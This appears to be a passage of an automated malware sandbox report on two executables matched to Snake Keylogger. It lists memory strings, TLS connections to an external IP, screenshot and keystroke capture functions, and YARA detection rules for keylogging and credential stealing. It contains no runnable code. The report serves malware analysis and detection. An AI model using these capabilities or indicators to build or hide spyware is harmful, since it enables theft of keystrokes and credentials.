                Source: PvAmrCZENy.exe, 00000007.00000002.2137565262.000000000368C000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 0000000C.00000002.2138512374.0000000003E9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
                Source: yxXYABHh.exe, 0000000C.00000002.2132407409.0000000002FA5000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 0000000C.00000002.2132407409.0000000002F96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                Source: PvAmrCZENy.exe, 00000007.00000002.2131837876.0000000002791000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 0000000C.00000002.2132407409.0000000002FA0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
                Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49688
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49687
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                Source: unknownNetwork traffic detected: HTTP traffic on port 49695 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49685
                Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49684
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49682
                Source: unknownNetwork traffic detected: HTTP traffic on port 49691 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49684 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49688 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                Source: unknownNetwork traffic detected: HTTP traffic on port 49682 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                Source: unknownNetwork traffic detected: HTTP traffic on port 49698 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49698
                Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49696
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49695
                Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49696 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49692
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49691
                Source: unknownNetwork traffic detected: HTTP traffic on port 49692 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49685 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49687 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
                Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49716 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49720 version: TLS 1.2

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Source: 0.2.PvAmrCZENy.exe.4d93e00.2.raw.unpack, COVID19.cs.Net Code: TakeScreenshot
                Source: 8.2.yxXYABHh.exe.4149990.3.raw.unpack, COVID19.cs.Net Code: TakeScreenshot
                Source: 0.2.PvAmrCZENy.exe.4d93e00.2.raw.unpack, COVID19.cs.Net Code: VKCodeToUnicode
                Source: 8.2.yxXYABHh.exe.4149990.3.raw.unpack, COVID19.cs.Net Code: VKCodeToUnicode

                System Summary

                barindex
                Source: 8.2.yxXYABHh.exe.4149990.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 8.2.yxXYABHh.exe.4149990.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 8.2.yxXYABHh.exe.4149990.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 8.2.yxXYABHh.exe.4149990.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 8.2.yxXYABHh.exe.4149990.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 8.2.yxXYABHh.exe.4149990.3.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.PvAmrCZENy.exe.4d93e00.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.PvAmrCZENy.exe.4d93e00.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.PvAmrCZENy.exe.4d93e00.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 8.2.yxXYABHh.exe.3949970.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 8.2.yxXYABHh.exe.3949970.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 8.2.yxXYABHh.exe.3949970.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 8.2.yxXYABHh.exe.3949970.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 8.2.yxXYABHh.exe.3949970.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 8.2.yxXYABHh.exe.3949970.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.PvAmrCZENy.exe.4d0c9e0.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.PvAmrCZENy.exe.4d93e00.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.PvAmrCZENy.exe.4d0c9e0.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.PvAmrCZENy.exe.4c855c0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.PvAmrCZENy.exe.4d93e00.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.PvAmrCZENy.exe.4c855c0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.PvAmrCZENy.exe.4d93e00.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 00000008.00000002.945371389.0000000003949000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000008.00000002.945371389.0000000004149000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000000.00000002.909841529.0000000004A53000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: PvAmrCZENy.exe PID: 7112, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: yxXYABHh.exe PID: 5912, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeCode function: 0_2_02FFDC5C0_2_02FFDC5C
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeCode function: 0_2_075EA7400_2_075EA740
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeCode function: 0_2_075EECC80_2_075EECC8
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeCode function: 0_2_075EBA100_2_075EBA10
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeCode function: 0_2_075EA7300_2_075EA730
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeCode function: 0_2_075EE0500_2_075EE050
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeCode function: 0_2_075EEF990_2_075EEF99
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeCode function: 0_2_075EEFA80_2_075EEFA8
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeCode function: 0_2_075EECB80_2_075EECB8
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeCode function: 0_2_075EBA000_2_075EBA00
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeCode function: 7_2_0244D2787_2_0244D278
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeCode function: 7_2_024453627_2_02445362
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeCode function: 7_2_0244C1467_2_0244C146
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeCode function: 7_2_0244C7387_2_0244C738
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeCode function: 7_2_0244C4687_2_0244C468
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeCode function: 7_2_0244CA087_2_0244CA08
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeCode function: 7_2_0244E9887_2_0244E988
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeCode function: 7_2_024469A07_2_024469A0
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeCode function: 7_2_02446FC87_2_02446FC8
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeCode function: 7_2_0244CFA97_2_0244CFA9
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeCode function: 7_2_0244CCD87_2_0244CCD8
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeCode function: 7_2_02449DE07_2_02449DE0
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeCode function: 7_2_0244F6317_2_0244F631
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeCode function: 7_2_0244FA887_2_0244FA88
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeCode function: 7_2_0244E97A7_2_0244E97A
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeCode function: 7_2_024429E07_2_024429E0
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeCode function: 7_2_02443E097_2_02443E09
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeCode function: 7_2_06401E807_2_06401E80
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeCode function: 7_2_064017A07_2_064017A0
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeCode function: 7_2_06409C707_2_06409C70
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeCode function: 7_2_064095487_2_06409548
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeCode function: 7_2_06400B307_2_06400B30
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeCode function: 7_2_064050287_2_06405028
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeCode function: 7_2_064029687_2_06402968
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeCode function: 7_2_06401E707_2_06401E70
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeCode function: 7_2_0640DE007_2_0640DE00
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeCode function: 7_2_0640E6AF7_2_0640E6AF
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeCode function: 7_2_0640E6B07_2_0640E6B0
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeCode function: 7_2_0640EF517_2_0640EF51
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeCode function: 7_2_0640EF607_2_0640EF60
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeCode function: 7_2_0640178F7_2_0640178F
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeCode function: 7_2_06409C6D7_2_06409C6D
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeCode function: 7_2_0640CCA07_2_0640CCA0
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeCode function: 7_2_0640D5407_2_0640D540
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeCode function: 7_2_0640D5507_2_0640D550
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeCode function: 7_2_0640DDFF7_2_0640DDFF
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeCode function: 7_2_0640E24A7_2_0640E24A
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeCode function: 7_2_0640E2587_2_0640E258
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeCode function: 7_2_0640EAF87_2_0640EAF8
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeCode function: 7_2_0640EB087_2_0640EB08
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeCode function: 7_2_06400B207_2_06400B20
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeCode function: 7_2_064093287_2_06409328
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeCode function: 7_2_06408B907_2_06408B90
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeCode function: 7_2_06408BA07_2_06408BA0
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeCode function: 7_2_0640F3B87_2_0640F3B8
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeCode function: 7_2_064000407_2_06400040
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeCode function: 7_2_0640F8027_2_0640F802
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeCode function: 7_2_0640F8107_2_0640F810
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeCode function: 7_2_064050187_2_06405018
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeCode function: 7_2_0640003F7_2_0640003F
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeCode function: 7_2_0640D0F87_2_0640D0F8
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeCode function: 7_2_0640D9997_2_0640D999
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeCode function: 7_2_0640D9A87_2_0640D9A8
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeCode function: 8_2_00B9DC5C8_2_00B9DC5C
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeCode function: 8_2_028072C08_2_028072C0
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeCode function: 8_2_028002C98_2_028002C9
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeCode function: 8_2_028002D88_2_028002D8
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeCode function: 8_2_0280EB058_2_0280EB05
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeCode function: 8_2_028072B38_2_028072B3
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeCode function: 8_2_028092378_2_02809237
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeCode function: 8_2_06A0CE988_2_06A0CE98
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeCode function: 8_2_06A087008_2_06A08700
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeCode function: 8_2_06A075188_2_06A07518
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeCode function: 8_2_06A082C88_2_06A082C8
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeCode function: 8_2_06A061108_2_06A06110
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeCode function: 8_2_06A05CD88_2_06A05CD8
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeCode function: 8_2_06C6A7408_2_06C6A740
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeCode function: 8_2_06C6ECC88_2_06C6ECC8
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeCode function: 8_2_06C6BA108_2_06C6BA10
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeCode function: 8_2_06C6A73C8_2_06C6A73C
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeCode function: 8_2_06C6E0508_2_06C6E050
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeCode function: 8_2_06C6EF998_2_06C6EF99
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeCode function: 8_2_06C6EFA88_2_06C6EFA8
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeCode function: 8_2_06C6ECB88_2_06C6ECB8
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeCode function: 8_2_06C6BA008_2_06C6BA00
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeCode function: 12_2_02BAD27812_2_02BAD278
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeCode function: 12_2_02BA536212_2_02BA5362
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeCode function: 12_2_02BAA08812_2_02BAA088
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeCode function: 12_2_02BA711812_2_02BA7118
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeCode function: 12_2_02BAC14612_2_02BAC146
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeCode function: 12_2_02BAC73812_2_02BAC738
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeCode function: 12_2_02BAC46812_2_02BAC468
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeCode function: 12_2_02BAD54812_2_02BAD548
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeCode function: 12_2_02BACA0812_2_02BACA08
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeCode function: 12_2_02BA69B012_2_02BA69B0
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeCode function: 12_2_02BAE98812_2_02BAE988
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeCode function: 12_2_02BACFAA12_2_02BACFAA
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeCode function: 12_2_02BACCD812_2_02BACCD8
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeCode function: 12_2_02BAF63112_2_02BAF631
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeCode function: 12_2_02BAFA8812_2_02BAFA88
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeCode function: 12_2_02BA29E012_2_02BA29E0
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeCode function: 12_2_02BAE97A12_2_02BAE97A
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeCode function: 12_2_02BA3E0912_2_02BA3E09
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeCode function: 12_2_0587954812_2_05879548
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeCode function: 12_2_05879C1812_2_05879C18
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeCode function: 12_2_0587502812_2_05875028
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeCode function: 12_2_0587D99912_2_0587D999
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeCode function: 12_2_0587D9A812_2_0587D9A8
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeCode function: 12_2_0587DDF212_2_0587DDF2
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeCode function: 12_2_0587D54012_2_0587D540
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeCode function: 12_2_0587D55012_2_0587D550
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeCode function: 12_2_0587295A12_2_0587295A
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeCode function: 12_2_0587296812_2_05872968
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeCode function: 12_2_0587CC8F12_2_0587CC8F
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeCode function: 12_2_0587CCA012_2_0587CCA0
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeCode function: 12_2_0587D0F812_2_0587D0F8
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeCode function: 12_2_0587000712_2_05870007
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeCode function: 12_2_0587F80112_2_0587F801
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeCode function: 12_2_0587F81012_2_0587F810
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeCode function: 12_2_0587501812_2_05875018
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeCode function: 12_2_0587004012_2_05870040
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeCode function: 12_2_0587178F12_2_0587178F
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeCode function: 12_2_05878B9012_2_05878B90
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeCode function: 12_2_058717A012_2_058717A0
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeCode function: 12_2_05878BA012_2_05878BA0
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeCode function: 12_2_0587F3A812_2_0587F3A8
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeCode function: 12_2_0587F3B812_2_0587F3B8
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeCode function: 12_2_0587EB0812_2_0587EB08
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeCode function: 12_2_05870B2012_2_05870B20
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeCode function: 12_2_0587932812_2_05879328
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeCode function: 12_2_05870B3012_2_05870B30
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeCode function: 12_2_0587EF5112_2_0587EF51
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeCode function: 12_2_0587EF6012_2_0587EF60
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeCode function: 12_2_05871E8012_2_05871E80
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeCode function: 12_2_0587E6AF12_2_0587E6AF
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeCode function: 12_2_0587E6B012_2_0587E6B0
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeCode function: 12_2_0587EAF812_2_0587EAF8
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeCode function: 12_2_0587DE0012_2_0587DE00
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeCode function: 12_2_0587E24912_2_0587E249
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeCode function: 12_2_0587E25812_2_0587E258
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeCode function: 12_2_05871E7012_2_05871E70
                Source: PvAmrCZENy.exe, 00000000.00000002.906373389.00000000032BC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs PvAmrCZENy.exe
                Source: PvAmrCZENy.exe, 00000000.00000002.921506836.00000000075C0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameCaptive.dll" vs PvAmrCZENy.exe
                Source: PvAmrCZENy.exe, 00000000.00000002.900799923.000000000147E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs PvAmrCZENy.exe
                Source: PvAmrCZENy.exe, 00000000.00000002.909841529.00000000041F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCaptive.dll" vs PvAmrCZENy.exe
                Source: PvAmrCZENy.exe, 00000000.00000000.876866707.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamenqHL.exe4 vs PvAmrCZENy.exe
                Source: PvAmrCZENy.exe, 00000000.00000002.919895324.000000000742A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePowerShell.EXE.MUIj% vs PvAmrCZENy.exe
                Source: PvAmrCZENy.exe, 00000000.00000002.919895324.000000000742A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamenqHL.exe4 vs PvAmrCZENy.exe
                Source: PvAmrCZENy.exe, 00000000.00000002.909841529.0000000004A53000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs PvAmrCZENy.exe
                Source: PvAmrCZENy.exe, 00000000.00000002.909841529.0000000004A53000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs PvAmrCZENy.exe
                Source: PvAmrCZENy.exe, 00000000.00000002.905542517.0000000003120000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs PvAmrCZENy.exe
                Source: PvAmrCZENy.exe, 00000000.00000002.909841529.000000000423B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCaptive.dll" vs PvAmrCZENy.exe
                Source: PvAmrCZENy.exe, 00000007.00000002.2129140223.00000000008F7000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs PvAmrCZENy.exe
                Source: PvAmrCZENy.exe, 00000007.00000002.2128526264.0000000000443000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs PvAmrCZENy.exe
                Source: PvAmrCZENy.exeBinary or memory string: OriginalFilenamenqHL.exe4 vs PvAmrCZENy.exe
                Source: PvAmrCZENy.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 8.2.yxXYABHh.exe.4149990.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 8.2.yxXYABHh.exe.4149990.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 8.2.yxXYABHh.exe.4149990.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 8.2.yxXYABHh.exe.4149990.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 8.2.yxXYABHh.exe.4149990.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 8.2.yxXYABHh.exe.4149990.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.PvAmrCZENy.exe.4d93e00.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.PvAmrCZENy.exe.4d93e00.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
